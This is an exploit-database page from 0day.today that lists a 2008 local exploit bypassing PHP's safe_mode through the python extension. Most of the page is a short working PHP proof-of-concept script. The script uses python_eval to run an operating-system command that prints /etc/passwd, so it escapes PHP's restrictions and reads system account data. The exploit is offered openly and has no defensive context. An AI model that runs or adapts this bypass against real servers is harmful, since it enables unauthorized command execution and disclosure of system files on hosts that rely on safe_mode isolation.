[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP python extension safe_mode Bypass Local Vulnerability

Author
Amir Salmani
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-7827
Category
local exploits
Date add
17-12-2008
Platform
multiple
=========================================================
PHP python extension safe_mode Bypass Local Vulnerability
=========================================================



<?php
/*
  php_python_bypass.php
  php python extension safe_mode bypass
  Amir Salmani - amir[at]salmani[dot]ir
*/

//python ext. installed?
if (!extension_loaded('python')) die("python extension is not installed\n");

//eval python code
$res = python_eval('
import os
pwd = os.getcwd()
print pwd
os.system('cat /etc/passwd')
');

//show result
echo $res;
?>



#  0day.today [2024-09-28]  #